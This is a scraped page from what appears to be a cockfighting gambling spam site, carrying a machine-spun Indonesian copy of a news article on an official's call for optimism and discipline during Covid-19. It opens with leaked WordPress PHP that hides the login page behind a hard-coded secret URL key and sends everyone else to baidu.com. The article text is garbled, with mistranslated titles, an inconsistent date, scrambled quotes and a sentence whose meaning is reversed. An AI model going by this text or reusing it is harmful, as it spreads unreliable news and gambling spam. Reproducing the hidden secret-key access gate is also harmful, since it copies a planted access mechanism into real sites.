//̨¼ add_action('login_enqueue_scripts','login_protection'); function login_protection(){ if($_GET['word'] != '2868973770')header('Location: https://www.baidu.com/'); } Pastor Benny tidak boleh pesimis tentang Covid-19: dibutuhkan imajinasi untuk hidup damai dengan Covid-19 | adu ayam bali_s128.net login_s128.live

Pastor Benny tidak boleh pesimis tentang Covid-19: dibutuhkan imajinasi untuk hidup damai dengan Covid-19

JAKARTA TRIBUNNEWS.COM – Staf Khusus Komite Pengembangan Ideologis (BPIP) Pancasila, Benny Susetyo (Benny Susetyo) meminta masyarakat Indonesia untuk tidak merasa pesimis terhadap pandemi Covid-19. Pastor Benny berkata, “Akhirnya, maksud saya kita tidak boleh pesimis tentang Covid-19. Untuk hidup damai dengan Covid-19, Anda benar-benar perlu menggunakan imajinasi Anda seperti sebelumnya.” . Pada Senin (6/1/2020), “berlabuh Pancasila dengan menyambut normal baru.” Kemudian, ia mengutip kalimat yang mengatakan bahwa orang Indonesia merdeka karena mereka memiliki cita-cita yang sama.

Menurutnya, inilah yang dibutuhkan oleh masyarakat Indonesia saat itu.

Bahkan jika orang Indonesia tidak melihat Sabang sampai Merauke, Pastor Benny memberi contoh, tetapi dalam imajinasi mereka, mereka melihat kami bersatu.

“Nah, persatuan seperti ini dapat mengatasi tantangan apa pun. Katanya.” Terutama jika elit politik, intelektual, pemimpin budaya dan masyarakat bersatu, masalah akan muncul. “Dia mengingatkan publik bahwa disiplin diri adalah hal terpenting dalam kehidupan dalam situasi saat ini.

Memang, belum ada yang bisa menemukan vaksin untuk melawan virus korona sejauh ini.

” Covid-19 belum ditemukan. Vaksin, oleh karena itu, sangat penting untuk kehidupan yang disiplin. Sekarang semua orang harus mematuhi disiplin diri dan disiplin. Katanya, berjalanlah sejauh dua meter, cuci tangan dan pakai topeng.

Leave a comment

adu ayam bali_s128.net login_s128.live